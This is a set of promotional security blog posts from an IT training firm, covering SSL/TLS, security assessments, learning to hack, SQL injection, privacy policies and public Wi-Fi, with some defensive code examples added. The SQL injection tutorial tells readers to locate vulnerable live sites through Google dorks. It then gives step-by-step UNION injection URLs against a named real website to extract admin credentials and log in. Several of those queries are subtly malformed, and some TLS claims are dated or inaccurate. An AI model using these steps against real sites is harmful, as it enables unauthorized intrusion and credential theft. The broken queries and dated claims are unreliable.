For example, when a web page requires an SSL connection, the URL changes from HTTP to HTTPS and you will see a padlock icon next to the address bar of the browser once the server has been authenticated.


The handshake process allows authentication to happen between the client and the server. When server authentication is complete, the client in turn presents its certificate to the server to authenticate its own identity before the encrypted SSL session is established.

Version 3.1 of SSL was released as TLS 1.0 (renamed to avoid legal issues with Netscape) after the IETF officially took over the SSL protocol in order to standardize it through an open process. Attacks against SSL have mostly focused on issues in SSL implementations. The POODLE (Padding Oracle On Downgraded Legacy Encryption) vulnerability, however, is a known flaw in the SSL 3.0 protocol itself, resulting from the way it ignores the padding bytes when running in cipher block chaining (CBC) mode. This flaw allows an attacker to decrypt sensitive data such as authentication cookies. TLS 1.0 is not vulnerable to this attack because it specifies that all padding bytes must have the same value and must be checked.
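The padding difference just described, as an added example that is not part of the original article: a minimal model of the SSL 3.0 and TLS 1.0 padding checks applied to a decrypted CBC record. The block size, the record layout and the sample record are constructed for the demonstration.

```python
"""Why SSL 3.0's padding rule is weaker than TLS 1.0's (added example).

After CBC decryption, a record is laid out as:
    <payload> <MAC> <padding bytes> <padding-length byte>
SSL 3.0 looks only at the final byte (the padding length) and ignores the
contents of the padding bytes.  TLS 1.0 requires every padding byte to carry
the padding-length value, so a record whose padding was altered in transit is
rejected instead of being silently accepted.
"""

BLOCK_SIZE = 8  # assumed cipher block size for this example (AES would be 16)


def ssl3_padding_valid(decrypted: bytes) -> bool:
    """SSL 3.0 rule: only the padding-length byte is inspected."""
    if not decrypted:
        return False
    pad_len = decrypted[-1]
    return pad_len < BLOCK_SIZE and pad_len + 1 <= len(decrypted)


def tls10_padding_valid(decrypted: bytes) -> bool:
    """TLS 1.0 rule: every padding byte must equal the padding-length byte."""
    if not decrypted:
        return False
    pad_len = decrypted[-1]
    if pad_len + 1 > len(decrypted):
        return False
    padding = decrypted[-(pad_len + 1):]
    return all(b == pad_len for b in padding)


def build_record(payload: bytes, mac: bytes) -> bytes:
    """Pad <payload><MAC> up to a block boundary in the TLS style."""
    body = payload + mac
    pad_len = (BLOCK_SIZE - (len(body) + 1) % BLOCK_SIZE) % BLOCK_SIZE
    return body + bytes([pad_len] * (pad_len + 1))


def corrupt_padding(record: bytes) -> bytes:
    """Constructed fault: overwrite the padding bytes (but not the length byte)
    with junk, modelling a record whose padding was altered in transit."""
    pad_len = record[-1]
    if pad_len == 0:
        return record
    junk = bytes(range(0x41, 0x41 + pad_len))  # 'A', 'B', 'C', ...
    return record[:-(pad_len + 1)] + junk + bytes([pad_len])


def strip_padding(record: bytes) -> bytes:
    """Return <payload><MAC> once the padding has been validated."""
    return record[:-(record[-1] + 1)]


if __name__ == "__main__":
    # Constructed sample: a short request plus a 20-byte placeholder MAC.
    good = build_record(b"GET / HTTP/1.0", b"M" * 20)
    bad = corrupt_padding(good)
    print("intact record  - SSL3:", ssl3_padding_valid(good), "TLS1.0:", tls10_padding_valid(good))
    print("altered padding - SSL3:", ssl3_padding_valid(bad), "TLS1.0:", tls10_padding_valid(bad))
```

The altered record passes the SSL 3.0 check and fails the TLS 1.0 check, which is exactly the behavioural difference POODLE relies on.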

There are other differences between TLS and SSL that make TLS a more secure and efficient protocol: its message authentication, the generation of key material, and the supported cipher suites, where TLS supports newer and more secure algorithms. The most recent version is TLS 1.2, and publication of the next version is expected before the end of this year, 2017, pending approval. This update is likely to be called TLS 1.3 or TLS 2.0.

Subscribe to our CEH course at SOUTECH Ventures to learn more about network security and this topic in full. Call us today: 08034121380

Check out SOUTECH's bespoke training sessions covering over 20 professional IT courses.

Professional IT Courses Training in Abuja: Web Design, Ethical Hacking, Networking, Mobile App Development, Project Management

Order any of our IT Training Kits

https://buyallsoftwares.com/

BEST PRACTICES FOR PERFORMING AN INFORMATION SECURITY ASSESSMENT-SOUTECHNIGERIA TIPS

Dear reader, do you know the best way to measure information security risk? My favourite answer is to dive in immediately and find the vulnerabilities that are specifically inherent in your systems and applications. This can be likened to humans going through different tests to know the state of their health, such as blood tests, analysis, magnetic resonance imaging and the like. Some IT experts refer to this kind of exercise as an IT security audit while others call it penetration testing. Well, I will say that when you are performing an in-depth analysis of any IT infrastructure, it is not just about comparing policies to how things actually work and trying to prove a point. This is why I prefer to call this exercise an information security assessment. An information security assessment is a broader and more meaningful standard for uncovering the areas where security policies and procedures are lagging.

The ultimate goal of security testing is to find and fix any weaknesses in a system before anyone gets to exploit them, and this is the core reason why the semantics of security testing are debated. It is therefore the duty of all security professionals to ensure that proper steps and measures are taken so that identified risks are understood. Let us put ego and politics aside and ensure that the key components of an effective information security scheme are given the attention they deserve. What are the key components of a detailed information security assessment?

1. Support: One of the important components is the support of management, because no information security assessment scheme can succeed without it. If the leadership of an organisation is not willing to invest its resources in making sure that its IT infrastructure is protected to a great extent, then the battle will be much more uphill. The focus should be on getting and keeping the right team on board. The target should not be management alone but also the security staff and members of the wider team.

2. Scope: This is a very vital phase of an information security assessment, and I have seen many examples where applications, systems and even the entire IT network were excluded from security testing. The reasons are usually the same: insufficient time and lack of money. As much as you need to fine-tune the scope of your work, you have to make sure that all the critical systems are looked at, and as soon as possible. Over time you may need to look at your entire environment, because it takes only one seemingly benign system, network segment or security process to put everything in jeopardy. The systems to be considered are the external and internal systems, the systems hosted in the cloud by third parties, and the marketing website. It is also absolutely necessary to do authenticated security testing of both the web applications and the operating systems. Ensure that a fair test is conducted on the people, the processes and all the physical systems.

3. Testing: The testing phase should begin with a vulnerability scan using a vulnerability scanner, followed by manual analysis to discover the areas that are susceptible to attack in the context of the business environment. This phase usually includes activities such as:

  • Password cracking
  • Wireless network analysis
  • Email phishing

The most important thing in this phase is to get an overview of the business environment from an attacker's viewpoint, in order to see the areas that can be exploited and then demonstrate what may happen, so that the issue can be analysed and steps taken towards resolving it.

4. Reporting: Producing a 500-page PDF report from a vulnerability scanner will make it neither easy to understand the issues nor easy to prevent them from recurring. The aim is a security assessment report that is concise, prioritises findings and gives recommendations on the way forward. The report does not have to be lengthy, but it needs to be drafted in a way that cuts to the chase and gives a detailed outline of the specific areas of weakness that should be given immediate and proper attention. This is done from the viewpoint and professional judgement of the security professional, taking into account the business and its systems. The elements of IT security auditing and penetration testing are incorporated here as well. There are many standards for drafting good reports, but I am not a big fan of following too many standards; I advocate that you draft something that works for you. You can look at templates such as the CVSS (Common Vulnerability Scoring System) and similar rating schemes, which, for instance, assign a severe rating to SNMP (Simple Network Management Protocol) being enabled with a default community string. If such findings are rated very high risk, then what about the danger of a weak firewall password, remotely exploitable missing patches, or SQL injection in internal web applications? Common sense should apply here; the worst kind of information security assessment is one that ends without a formal report and with issues that never get resolved.

5. Resolution: After a detailed report has been produced, we must take all the discovered problems and develop solution plans for them. Above all, problems should be found and fixed. I have seen security reports that still contain unacknowledged findings and pending fixes long after the assessment. There is an easy fix, which is assigning responsibilities and ensuring that everyone is held accountable. The usual cycle for performing information security assessments spans from six months to a year depending on the environment. A complementary approach is a follow-up 30 to 45 days after the report is drafted, performing remediation validation of all the critical and high-priority findings.

6. Oversight: This involves ensuring that the security process continues between assessments. It will require things like tweaking the existing systems and software, implementing new technical controls, and updating policies and processes. Instead of trying to achieve perfect security, your target should be moving forward towards good security, with a shorter time for catching flaws and resolving them. Management must be engaged in achieving this plan, with the executives kept on board regarding what is required in terms of compliance and contractual obligations. Whether or not they are interested, the right people must be kept involved to make sure security is maintained. By doing this, return on investment is assured, which is essential for business growth. Note that security is not something to be put out of mind but a priority.

As final words, I will say that the bottom line is that every business organisation has information and computing infrastructure that criminal hackers or malicious attackers are interested in for their own gain. Of course, you know that you can never be totally safe or immune from information risks and attacks, so you must know the value of information security assessments. I would advise organisations and businesses not to depend on IT security auditing and penetration testing alone to be safe. Neglecting IT security assessments is not a defensible option for due care. Furthermore, take time to properly plan and strategise on how to perform an information security assessment, ensuring that the task is completed and that the proper staff members in IT, development, management and elsewhere are briefed on the findings so that the issues can be resolved.

Some security professionals and vendors will try to paint information security assessment as an exercise that is not difficult to perform and not a very expensive project given its return on investment. But I must tell you that your information security program will be a deep reflection of what you invest in. That means if you fail at it, then you stand a huge chance of having your infrastructure shut down. So, I will leave you with a quote from Warren Buffett, which says “you only have to do a very few things in your life so long as you don’t do too many things wrong.” Assessments are not, and never will be, the perfect solution to your security problems, even when performed periodically and consistently. The fact that you have tall fences, a big strong gate and armed men at your door does not guarantee your safety 100%. However, there is a high level of assurance that if you choose to ignore this exercise, history will surely repeat itself.

You can subscribe to our services at Soutech Ventures to get the security guidance you may require to carry out a detailed and successful information security assessment. You can also take our Ethical Hacking course from EC-Council, which is designed to educate you and give you hands-on knowledge of how to secure your infrastructure.

Want to become a Hacker? What you must do!- Soutech Ventures CEH training

Are you a beginner whose intention is to learn how to hack, but you are wondering where to start? If you are in this category, then I’ve got your back; you are definitely in the right place. If you’ve noticed, most of the free books and resources on hacking you may find on the internet are actually crafted for persons with some level of knowledge in the subject area. These materials do not give a comprehensive picture of how hacking works.

This is the reason why I have decided to post something for beginners and anyone who needs to start their journey into the hacking world and become a hacker. I am going to describe a few requirements and the basic things to do to make the journey a pleasant experience for you.

 What is the Best way to Learn hacking as a beginner?

Here are a few steps; let’s go:

STEP 1: Start with the Basics

In my usual way, I always advise beginners who have had little or no prior knowledge of hacking to begin from the basics. Do not just try to learn how to hack anything; instead, start exploring or researching topics in IT such as computer networks, network services and common ports (FTP, TCP, SMTP, HTTP, HTTPS, DNS etc.), firewalls, some common and widely used network protocols, and IP addresses. You can also study how they work.

You may also learn about operating systems such as Linux, which is one of the basic operating systems used in the hacking environment. Just so you know, the more you understand the basic working principles of IT-related topics and concepts, the easier it becomes for you to find vulnerabilities and devise exploits. This will also go a long way to help you when applying your hacking techniques in practice. Hacking covers the weaknesses or vulnerabilities in every field of IT, so you need, to some extent, a good grounding in the basics. So begin your research now.

Step 2: Get a reliable and good source to begin your learning

If you desire a fair knowledge of basic hacking and the trending technologies in the IT field, there are books and websites online that can equip you technically. These books can also give you some technical background in vulnerabilities and the possible ways to exploit them. However, it can be very difficult to find books and web resources that directly teach you how to hack from the basics in a simple and easy way.

If one has a fair amount of experience in the field of hacking, there exist many books and websites that give technical information on the latest vulnerabilities along with possible ways to exploit them. However, for beginners it is hard to find sources that teach hacking right from the basics in a simple and easy-to-follow manner.

Step 3: Learn a programming Language (Optional)

Learning a programming language keeps you a step ahead of other hackers and builds on any skill you have acquired. There are a lot of readily available programs and ready-made tools that make hacking easy, but it is always better to have some basic knowledge of scripting and programming languages like JavaScript and PHP, so that you are in a position to build your own tools and exploit code. As I said in the heading of this step, it is totally optional; there are many hackers who do not specialise in programming.

Step 4: Enroll for an Ethical Hacking Course

One of the courses structured to give you apt and excellent knowledge and skill in hacking is the EC-Council Certified Ethical Hacker (CEH) course. There are other courses along this line, such as CISSP, which is governed by another body. But CEH is a basic start for you if you must learn about hacking and be very well grounded. CEH v9 offers about 19 modules that are well structured to cover all the IT fields.

If you are in Nigeria, precisely in the cities of Abuja and Lagos, and you intend to take up a CEH course, you can call us today at Soutech Ventures or visit our website. There you will find every piece of information you may need. We have experienced and certified tutors in this field who can teach you with a clear and simple breakdown of the concepts of the CEH syllabus. So be sure you have made the right choice in Soutech.

How Long does it take to be a Good Hacker?

I always tell my students that hacking cannot be mastered overnight and the process must never be rushed. It is a field that combines in-depth knowledge, skills, creativity, dedication and a great deal of invested time. It may take anywhere from a few months to a few years to become skilful in hacking, depending on the time and effort you invest. In fact, everyone can become very skilful, but it depends on how they learn and the foundations they build. The foundation you give yourself matters a great deal; if the foundation is lacking in a certain aspect, you will have trouble understanding and working on some technical details. So, if you want to become a good hacker, all you need is the passion to learn and a good source of knowledge that will help you understand the basics, together with some patience and perseverance.


Tutorial on SQL Injection: SOUTECH Ventures

What is SQL Injection?

SQL injection, often referred to as SQLi (structured query language injection), is a malicious attack on a website whereby an attacker injects an SQL command (the payload) into an SQL statement that controls the database of a web application. The database behind the web application is a Relational Database Management System (RDBMS), and the attack enters through a web input field.

SQL injection vulnerabilities are known to damage websites and web apps that use an SQL-based database. SQLi has long been one of the most lethal means of attacking websites, whereby an attacker attempts to exploit a web application. To bypass the authentication and authorization mechanisms of a web application, the attacker uses SQLi to gain unauthorized access to the web app. After gaining access, the attacker or malicious user can delete, modify or update the database, or make changes to columns or rows, depending on their intentions at the time. When this is done, the integrity of the data in the SQL-based database is compromised.

How Does SQL Injection work?

In order to exploit the web application, all the attacker has to do is find an input field whose value is embedded in an SQL query to the database. A vulnerable website places user input directly into the SQL statement, which is what allows an SQLi attack to take place. The attacker then injects the payload, which is included in the SQL query and in turn executed on the database server.

Before launching any attack, you have to check how the server responds to user input in its authentication mechanism. The following code shows a typical authentication check whose handling of user input is vulnerable:


<?php
// define POST variables from the login form
$Uname = $_POST['name'];
$Upassword = $_POST['password'];

// SQL query vulnerable to SQLi: the user-supplied values are spliced
// straight into the statement text, so quote characters in the input
// change the structure of the query
$sql = "SELECT id FROM users WHERE username = '$Uname' AND password = '$Upassword'";

// execute the SQL query against the database ($database is the application's DB handle)
$database->query($sql);

The code above is vulnerable to SQL injection: an attacker can submit a malicious payload that alters the SQL statement being executed and thereby gain access to the web application.

One example of an SQL injection payload that can be submitted in the password field is

Password' OR '1'='1

Because the added condition is always true, the query that actually runs against the database server becomes

SELECT id FROM users WHERE username='username' AND password='Password' OR '1'='1'
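The same login check rebuilt in Python against an in-memory SQLite database, as an added example that is not part of the original tutorial: the string-built query from the PHP snippet beside the parameterised version that closes the hole. The users table, the ‘alice’ account and the plaintext password column are constructed for the demonstration only.

```python
"""Vulnerable login query beside its parameterised fix (added example)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed demo database: one user, password stored in plaintext
    only so that the query mirrors the PHP snippet exactly."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password) VALUES ('alice', 'correct horse')"
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Mirror of the PHP code: input is spliced into the SQL text, so a quote
    in the password terminates the literal and the rest is parsed as SQL."""
    sql = (
        f"SELECT id FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterised query: the statement text is fixed and the driver passes
    the values separately, so input is only ever compared as data."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "Password' OR '1'='1"  # the payload discussed above
    print("valid creds, vulnerable:", login_vulnerable(db, "alice", "correct horse"))
    print("payload, vulnerable    :", login_vulnerable(db, "nobody", payload))
    print("payload, parameterised :", login_safe(db, "nobody", payload))
```

Run stand-alone, the vulnerable function returns the user id for an unknown username combined with the payload, while the parameterised version returns None.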

What an attacker can do with SQL?

SQL is a language used to work with relational database management systems. As I said earlier, SQL can be used to delete, modify or update databases, or the columns, rows and tables within an RDBMS. SQL is a powerful language, and attackers can use it to exploit the databases of web applications, taking total charge of the application without the knowledge of the administrator.

Having said all this, let us see what an attacker can do with SQLi.

  • It can be used to bypass authentication mechanisms or to impersonate a specific user.
  • It can be used by an attacker to delete records from a database, and even if a proper backup plan is in place, deleted data can affect the availability of an application until the database is restored.
  • SQL can be used to select data based on a set of input queries and return the results, which could allow the disclosure of data residing on the web server.
  • SQL can be used to alter or modify data in the database. As you know, when data is altered its integrity is lost, and issues of repudiation can arise, such as voided transactions, altered balances and other records.
  • Some database servers are configured to allow the arbitrary execution of operating system commands. When such conditions are present, a malicious user can use SQLi to bypass firewalls and penetrate the internal network.

Using SQL Injection to Hack a Website

Now let us see how SQL injection is used to hack websites.

Step 1

The first thing is to search Google for “google dorks”. I got the following results from my search; you can also search for your own.


These are just a few of the basic dorks that are available, but you can also create your own dorks in order to find websites. These dorks can help you find sites that are vulnerable to SQL injection, which can be used to bypass authentication.

STEP 2

Search Google for SQL-vulnerable websites. The next thing is to open one of them to check whether it is vulnerable to SQLi.

I will use this website as an example.

http://www.tadspec.com/index.php?id=44

Now, when you choose your link, make sure it is different from mine, because there are many sites available.

Please note, that this practical session is just for educational purposes and therefore I do not in any way take responsibility for your actions.

Now let’s check whether the site I have chosen is vulnerable to SQL injection or not. This is done by appending an apostrophe (') to the end of the URL, so that the end of the address reads:

.php?id=44'

If after you do this and you get a result like this;

  • “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1.”

Then bingo, the site is vulnerable to an SQL injection attack, and we can go ahead to the next step.

STEP 3

In this step, we have to check the number of columns in the table the website queries. We input these numbers manually so we can count the columns:

http://www.tadspec.com/index.php?id=44 order by 32


Please note that the number “32” is arbitrary and the value at which the query fails varies with the number of columns you find. So you have to make successive attempts to find the number of columns available.

After putting “32”, this is what you get:

Unknown column ‘32’ in ‘order clause’

And if we put the link below in URL,

http://www.tadspec.com/index.php?id=43 order by 31

this will load the website’s page normally, which means that the query worked.

It therefore means that the number of columns available in this website’s query is 31.

STEP 4

In this fourth step, we are going to determine the version of the database.

We will use the following query;

http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,6,7,8,9,10,11-

When you run this query, a number will show boldly on your screen. Mine is 6. So, in place of the 6 in your URL, put @@version. This will give you the version of the SQL database that the website uses.

So, you have something like

http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,@@version,7,8,9,10,11-

STEP 5

Next we place the expression ‘group_concat(table_name)’ in the position of column 6 and add a further clause at the end of the URL.

So it is going to look like this:

http://www.tadspec.com/index.php?id=null union all select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11-from information_schema.tables where table_schema=database()-

The result of this query will be the names of the database tables. You can copy them if you wish to use them for further analysis.

STEP 6

We will now try to find the column names in the database by changing “tables” to “columns” in the query:

http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11-from information_schema.columns where table_schema=database()-

When you enter this query, the result will be the names of the different tables present on this website.

STEP 7

Recall that in the previous step we obtained the names of the columns in the database, so the next thing is to search for the columns holding credentials, because they can be used to retrieve sensitive data such as usernames and passwords. These are the columns that give access to the application.

Use this query to get there:

http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10,11-from admin-

The group_concat() function was used to output the username, then 0x3a (the hexadecimal code for a colon, used as a separator), and then the other column name. We removed the information_schema clause and wrote the admin table at the end, which means we are now selecting those columns from the admin table.

If you have succeeded in this, then congratulations, you have successfully performed an SQL injection.
Go ahead, find the website’s login page and enter those credentials in the fields present.

Please note that this tutorial is strictly for educational purposes. We at SOUTECH are not responsible for your actions.

I have withheld some of the diagrams and pictorial explanations; if you want to learn about them, enroll in our CEH course to learn comprehensively about this subject and more. Call us today.


Terms of Service: Do you ever read them? Stay Informed

Some people have a habit of not reading through the Terms of Service whenever they get a new application or buy a new device. I must let you know that this is a big mistake, because many of the apps available in the market, commonly known as greyware, rely on you to get access to your personal information. The developers know that a lot of people do not read through the Terms of Service, so they often include language that authorizes a massive invasion of privacy. You may also have noticed that most Terms of Service are just boilerplate. So how do you read through a Terms of Service to find out what it says about privacy, without wasting a lot of time on standard terminology?

What are Terms of Service?

The Terms of Service, commonly abbreviated as ToS, is a legal document used by websites and internet service providers (ISPs) that hold users’ personal information, such as social networking services and e-commerce sites.

Elements of Terms of Service?

A typical ToS contains the following:

  • Definitions of key words and phrases, and disambiguation.
  • Rights and responsibilities of the user.
  • Expected or proper usage, and what constitutes misuse.
  • Accountability for all online actions, conduct and behaviour.
  • An outline of how personal data is used, also known as the privacy policy.
  • Details concerning payments, such as membership or subscription fees.
  • Opt-out policies, with detailed procedures for opting out.
  • Arbitration, carrying details of how disputes are to be resolved and the extent of the right to take issues to court.
  • Notification of the user whenever any modification is made.


Privacy Policy

I mentioned the privacy policy as a key element of the Terms of Service. Now I will shed some more light on privacy policies.

The area you really have to focus on when reading Terms of Service is the privacy policy, because it is the part that deals with the security and integrity of your data. The other information in the ToS is not really relevant to securing your data. Therefore, whenever you come across a typical ToS, just scroll to the part that contains the privacy policy and start reading from there.


There is a second problem you may come across while reading through the ToS, which is that Terms of Service are usually written in legalese. This makes them somewhat difficult to understand, even for people who are in the habit of reading such documents.

Let me show you how to decipher a privacy policy document.

The first thing you must know is that every privacy policy basically has five parts:

  • Notice: This is the most important part of the privacy policy. It tells you what information the company will collect and how that information will be used; it describes the company's information practices.
  • Security: This is another important part of the privacy policy, in that it informs you of what the company is doing to secure the data it has collected from you. Possible security measures include administrative, physical and technical security.
  • Access and Correction: This is the part that details who can access your data, who the data can be shared with, and under what circumstances.
  • Consumer choice: This provides an opt-out option governing whether consumers' personal information may be disclosed to any unaffiliated third party.
  • Enforcement: This details the measures for enforcing the privacy policy. Enforcement can be managed by the company itself or by an independent third party such as BBBOnline or TRUSTe, which checks compliance with the privacy policy.

Please take note that every renowned and reputable organization wants its privacy policy to be as transparent as possible while also adhering to the letter of the law. On the other hand, there are companies that want to take advantage of you and will therefore make their policies unnecessarily complicated.

Details to look for in a Typical Privacy Policy

Since privacy policies for many different companies are readily available online, it can be hard to narrow down what you should actually look for in one. Here are a few things to check:

  • A comprehensive list of what kind of data is collected from you. Some data has to be collected for a product to function at all, but the company must always state which types of data it collects.
  • A list of who the data is shared with and why. The language here is often vague, for example just "third parties".

So ask: under what circumstances is your data collected? Is it shared only with companies that have their own security policies, and only in the course of a normal business transaction?

If the policy does not clearly explain who these third parties are and when your personal data may be shared with them, treat that as a big warning sign.

  • The language of the privacy policy should focus on how the company intends to protect your data, including an explanation of how the data is stored. Look carefully for this part. If it is missing, that is another warning sign: go and look for a competing piece of software or hardware that performs the same function.
  • If you have any doubts, send an email to the provider's customer service with your questions clearly listed. Reputable organisations will normally answer all your questions promptly.

Sometimes the problem is not that the company refuses to answer your questions or intends to do something nefarious with your personal data. It may simply not be taking internet security and privacy seriously enough. That kind of lax security sets both you and the company up for a major breach.

As a parting word, it is worth taking a little time to read through licence documents and terms of service, or at least to scroll through them for a minute before ticking the "I agree" box. Subscribe to the security course at SOUTECH Ventures, where you will be taught and equipped with what you need to know to become security conscious. Call us today to get certified in CEH.

 

Just how safe are public Wi-Fi networks? Stay protected - Soutech Ventures

Free Wi-Fi in public places has become the norm in larger cities around the world. Restaurants, coffee shops, libraries, hotel rooms, satellite offices, airports and many other places now offer it. A free, easily accessible connection is a convenient way to catch up on work, meet targets, log in to online accounts, check email and so on. However, most of us are unaware of the security risks that come with public Wi-Fi. If you are going to access sensitive information or carry out sensitive transactions over Wi-Fi, there are additional measures you need to take to stay safe online, and those measures are the subject of this write-up.

A Norton survey reported that over 68% of people fell victim to incidents on public, unsecured Wi-Fi in the previous year. We therefore need to take practical steps to keep our devices safe and protected.

A brief history of Wi-Fi encryption standards

Let me shed some light on the encryption protocols and standards that preceded the one used on today's Wi-Fi networks. One of the first encryption schemes for wireless network devices was Wired Equivalent Privacy (WEP), and it was found to be weak and very easy to crack. Although WEP is still offered as an option on many wireless access points and devices, it should be retired, and hardware that only supports WEP should be upgraded to hardware supporting the newer standards wherever possible.

WEP was designed with the following goals:

  • Prevent eavesdropping on communications, that is, reduce any unauthorised disclosure of data.
  • Ensure the integrity of data as it flows across the network.
  • Encrypt packets in transit using a shared secret key.
  • Provide access control, confidentiality and integrity in a lightweight and efficient scheme.

WEP failed at several of these goals, which led to WPA.

Wi-Fi Protected Access (WPA) was the successor to WEP, created to check and curb the many issues found in the WEP standard. Its encryption did address some of WEP's vulnerabilities, but WPA too was later found vulnerable and cracked. Unlike a full replacement, WPA was designed to run on existing WEP-era hardware through firmware updates rather than requiring hardware upgrades.

That compatibility came at a cost: processing power and the available mechanisms were limited, especially on older hardware. The Temporal Key Integrity Protocol (TKIP) was the cipher suite built to underpin WPA. TKIP improved on WEP because WEP used one static, unchanging key for every frame transmitted, whereas TKIP derives a fresh per-packet key and adds a message integrity check.

WPA nevertheless suffered from the following flaws:

  • Weak keys (passphrases) chosen by users
  • Packet spoofing (forgery) issues
  • Authentication weaknesses in the Microsoft Challenge Handshake Authentication Protocol (MS-CHAP) used by some enterprise deployments

This gave way to the WPA2 standard, intended to address the flaws in WPA. WPA2 came with a stronger encryption standard, CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol), which is built on AES (Advanced Encryption Standard). CCMP provides both encryption and a Message Integrity Code (MIC). TKIP (Temporal Key Integrity Protocol) is retained in WPA2 only for backward compatibility with older clients and should not be used where CCMP is available.

WPA2-Enterprise is the version that incorporates the EAP standard (via IEEE 802.1X) to strengthen authentication and make the system scalable for large organisations and enterprises. WPA2 is notable because it offers improved security over its predecessors and implements the IEEE 802.11i security standard. In enterprise mode it uses an authentication server (typically RADIUS) to handle authentication and key management for wireless clients.

WEP, WPA and WPA2 all have known weaknesses that an attacker can exploit against a victim; each of them has been attacked in practice in recent years.

Why Public Wi-Fi is Vulnerable to cyber attacks

Given the weaknesses in the protocols described above, users still suffer a great deal from both known and unknown flaws. The fact that you need a password to join a Wi-Fi network does not mean that your online activity is encrypted, nor that a public Wi-Fi network is secure. A few issues make public Wi-Fi susceptible to attack. One is the encryption protocol the network uses. Another is the possibility of connecting to a rogue Wi-Fi hotspot. Tools such as Aircrack-ng are readily available online and can recover WEP keys and run dictionary or brute-force attacks against weak WPA/WPA2 passphrases.

The risk of joining a rogue hotspot is a big issue with free public Wi-Fi. All an attacker has to do is set up a rogue hotspot and wait for victims to connect to it, which places the attacker in a man-in-the-middle (MITM) position: they can intercept the communication between you and the server of whatever website you are visiting. Pre-built tools make it easy to eavesdrop, capture sensitive information such as login credentials, credit card numbers and social media passwords, and monitor online traffic while carrying out MITM attacks.

 

What are the signs that you may have logged on to a Rogue Wi-Fi?

Remember that when a device is looking for Wi-Fi it sends probe requests for the networks it already knows, and an attacker can leverage this. An attacker can configure a rogue hotspot that answers to the name of your home network, or of the network at a typical coffee shop. Your device may then connect to the attacker's rogue hotspot instead of the genuine public one.

Another trick you should know about: an attacker can create an open network named something like "Free Wi-Fi" and simply wait for victims to connect, because people will naturally join such a network, especially when free internet is on offer. I must say that I personally was a victim of this a few years ago. If you are at a coffee shop or another public place and your device suddenly reports that it is connected to your home network, there is a strong chance that someone has captured your device's broadcast probe request and is impersonating that network. Likewise, if a website that should normally be served over HTTPS, such as your bank or your favourite social media site, is instead loading over HTTP, someone may be intercepting your connection. An attacker in that position can perform a MITM attack by serving you an HTTP version of the site in order to capture your login credentials. So always be on the lookout for these little details.
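The two signs above (a saved, encrypted network suddenly appearing open or from an unknown access point, and an open "Free Wi-Fi" next to a real network of the same name) can be checked mechanically against a scan of nearby networks. The script below is an added example and not code from the original article; the scan records and the saved-profile list are constructed inline, and their field names are an assumption chosen to resemble what you would get from parsing the output of a tool such as `nmcli -f SSID,BSSID,SECURITY,SIGNAL dev wifi list`.

```python
"""Flag Wi-Fi scan results that match the rogue-hotspot signs described above.

Added example, not code from the original article. Scan records and the saved
profile list are constructed here; the field names are an assumption, chosen
to resemble what you would get from parsing a tool such as
`nmcli -f SSID,BSSID,SECURITY,SIGNAL dev wifi list`.
"""
from collections import defaultdict

OPEN = ""  # empty security field means an open (unencrypted) network
GENERIC_BAIT_NAMES = {"free wi-fi", "free wifi", "public wifi", "airport wifi"}

# Constructed sample scan: what a laptop might see in a coffee shop.
SCAN = [
    {"ssid": "CoffeeShop_Guest", "bssid": "AA:BB:CC:00:00:01", "security": "WPA2", "signal": 62},
    {"ssid": "CoffeeShop_Guest", "bssid": "DE:AD:BE:EF:00:01", "security": OPEN,   "signal": 88},
    {"ssid": "HomeNet",          "bssid": "DE:AD:BE:EF:00:02", "security": OPEN,   "signal": 90},
    {"ssid": "Free Wi-Fi",       "bssid": "DE:AD:BE:EF:00:03", "security": OPEN,   "signal": 85},
    {"ssid": "Library",          "bssid": "11:22:33:44:55:66", "security": "WPA2", "signal": 40},
]

# Constructed sample: networks this device has saved and will auto-join,
# with the BSSIDs it has previously connected to.
SAVED_PROFILES = {
    "HomeNet":          {"security": "WPA2", "bssids": {"00:11:22:33:44:55"}},
    "CoffeeShop_Guest": {"security": "WPA2", "bssids": {"AA:BB:CC:00:00:01"}},
}


def find_rogue_candidates(scan, saved_profiles):
    """Return {ssid: [reason, ...]} for every network matching a rogue-AP pattern."""
    findings = defaultdict(list)

    def note(ssid, reason):
        if reason not in findings[ssid]:
            findings[ssid].append(reason)

    by_ssid = defaultdict(list)
    for net in scan:
        by_ssid[net["ssid"]].append(net)

    for ssid, nets in by_ssid.items():
        securities = {n["security"] for n in nets}

        # Evil twin: the same name advertised both encrypted and open. The open
        # copy (usually with the stronger signal) is the attacker's AP.
        if len(securities) > 1 and OPEN in securities:
            note(ssid, "same SSID advertised both open and encrypted")

        # Bait: an open network with a generic "come and join" name.
        if ssid.lower() in GENERIC_BAIT_NAMES and OPEN in securities:
            note(ssid, "open network with a generic bait name")

        saved = saved_profiles.get(ssid)
        if saved is None:
            continue
        for n in nets:
            # A network the device knows as encrypted must never appear open:
            # this is the "home network" answering your probe in a coffee shop.
            if saved["security"] != OPEN and n["security"] == OPEN:
                note(ssid, "saved encrypted network seen as open")
            # An unknown BSSID for a saved network is weaker evidence on its own
            # (a genuinely new access point looks the same), so label it as such.
            if n["bssid"] not in saved["bssids"]:
                note(ssid, "saved network seen from an unknown BSSID (lower confidence)")

    return dict(findings)


if __name__ == "__main__":
    for ssid, reasons in find_rogue_candidates(SCAN, SAVED_PROFILES).items():
        print(f"{ssid}:")
        for reason in reasons:
            print(f"  - {reason}")
```

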